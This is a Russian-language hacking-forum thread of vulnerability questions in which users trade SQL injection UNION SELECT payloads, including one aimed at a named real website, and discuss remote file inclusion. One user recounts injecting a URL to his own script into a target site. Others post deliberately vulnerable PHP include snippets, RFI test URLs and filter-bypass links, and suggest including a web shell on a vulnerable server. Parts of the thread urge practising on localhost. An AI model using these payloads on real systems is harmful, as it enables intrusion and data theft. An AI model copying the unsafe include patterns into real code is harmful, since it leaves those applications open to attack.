Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    Code:
    -34+UNION+SELECT+1,2,3,4,5,6, COLUMN_NAME,8+FROM INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=’MyUsers’ +LIMIT+[COLOR=Red]1[/COLOR],1--
    почитать можно тут:
    https://forum.antichat.ru/thread43966.html
     
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    правильнее этот запрос:

    Code:
    http://wallstreetcorner.com/disclaimer.html?Symbol='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+Situations+where+1%00
    
    выдает открывает страницу норм, но там нету ни одного visible поля (((
     
  3. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    чем он правильнее???


    скуля не принтабельна, поэтому и не выводится ниодного поля
     
  4. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Только понта с этого нету.
    Выводится в адресную строку браузера 9 поле где привет написано)
     
    #9884 ILYAtirtir, 10 Nov 2009
    Last edited: 10 Nov 2009
    2 people like this.
  5. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    наконец себе делал хост и пытаюсь поэкспереминтировать PHP инекции.
    у меня сайт такой:
    www.mysite.ru
    цель: www.123.ru

    на мой сайт залил скрипт:
    Code:
    <? 
    .. 
    Include ("$page.php"); 
    … 
    ?> 
    открываю сайт жертвы, захожу в любой раздел и получаю такой адрес:
    http://www.123.ru/index.php?action=page&id=149

    мой код на сервере под названием ххх.php.

    я переделываю ссылку так:
    http://www.123.ru/index.php?action=http://mysite.ru/xxx.php
    - открывается главная страница.
    делаю так:
    http://www.123.ru/index.php?action=page&id=http://mysite.ru/xxx.php
    пишет:
    Запрашиваемая вами страница не найдена.

    Я ошибку делаю, или просто на сайте фильтровывается ?

    P.S. читал здесь:
    http://forum.antichat.ru/thread12123-lfi.html
     
  6. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    что то ты путаешь, с чего ты взял что переменная id на сайте www.123.ru вообще что-то инклюдит, тем более что-то удаленное?
     
  7. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Да и инклудить надо не php скрипты на удалённом сервере...а txt например.
     
  8. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    ммм, ребята, читая ЭТУ статью - так получается...
    можете сказать как делать тогда ?
     
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    B1t.exe, при чем здесь инклуд?
     
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Там вообще показаны примеры инклуда на твоем сервере. Чувствую я, что ты ничего не понимаешь в этом...
     
  11. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    B1t.exe
    сделай на локалке что то подобное
    PHP:
    <?php
    $page 
    $_GET['page'];
    include(
    $page);
    ?>
    и попробуй заюзать script.php?page=[inj]
     
  12. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    На локалхосте поэксперементируй с LFI, а что у тя есть исходники страницы 123.ru/...., откуда ты узнал что id именно инклудится?
     
  13. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139

    Для удаленного инклуда на срвере должен быть включен allow_url_include.
    В плюс к тому- очень мала вероятность того, что у тебя инклуд, тем более удаленный.

    P.S.: Почитай лутше вот эту статью:
    http://forum.antichat.ru/thread23501.html
    В ней задохлик очень хорошо описал процесс проверения пхп инжектов. Это пожалуй лутшая статья на античате на тему php injection, ИМХО.
     
    #9893 Ins3t, 10 Nov 2009
    Last edited: 10 Nov 2009
  14. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    я не понимаю .. на локалке. т.е. ?
    на свем компе ? зачем?
    я залил этот скрипт на сервер (интернет) и при запросе
    www.mysite.ru/ххх.php
    Я не знаю что там есть, просто в статье написан, что пыполните это на удаленном сервере и если выдаст те ошибки, значит инклюд есть. по этому и я так делал.
     
  15. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    b1t.exe, иди учи php
     
  16. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Да и зачем инклудить то что в свою очередь тоже что-то инклудит?)) Если уж и есть уязвимость,то правильней было бы инклудить шелл,или какой-нить код,который надо выполнить,например копирование шелла,вотъ...
    там,где якобы уязвимость.
     
  17. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    2B1t.exe, омг.

    PHP:
    <? 
    Include (
    "$page.php"); 
    ?>
    Точки забыл убрать)

    Есл хочешь попрактиковаться с RFI - лезь у себя в php.ini, ищи директиву allow_url_include и выставляй ее в положение ON, так как по дефолту она отрублена.
    Затем можешь заюзать такой скриптек:

    PHP:
    <?
    $inc $_GET['file'];
    include (
    $inc);
    ?>
    И реализовуй:
    Code:
    localhost/script.php?file=http://google.com
    Затем постепенно усложняй:

    PHP:
    <?
    $inc $_GET['file'];
    if(
    file_exists($inc))
    {
    include (
    $inc);
    }
    else
    {
    echo 
    'ERROR!';
    }
    ?>
    И снова реализовуй:
    Code:
    localhost/script.php?file=ftp://login:pass@host/file.php
    И так далее.

    Так же если фильтруются ".", "/", юзай способ описаный товарисчем cr0w:
    https://forum.antichat.ru/thread106780.html
    По аналогии и с ЛФИ, нy кароче ты понял)
     
    #9897 Ins3t, 11 Nov 2009
    Last edited: 11 Nov 2009
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Сомневаюсь...

    B1t.exe, если ты действительно хочешь научиться LFI, RFI, да и вообще поиску уязвимостей, советую тебе сначала изучить пыху хотя бы поверхностно.
     
    1 person likes this.
  19. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    ))))))) ага, точно ! спасибо большое.

    У меня на этом сервере нет ничего. я специально брал домен и хост для тренировки. хост конечно, бесплатный, но поддерживает почти все, что надо.
     
  20. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    о___О

    А на своей тачке потестить не судьба?)
     
Thread Status:
Not open for further replies.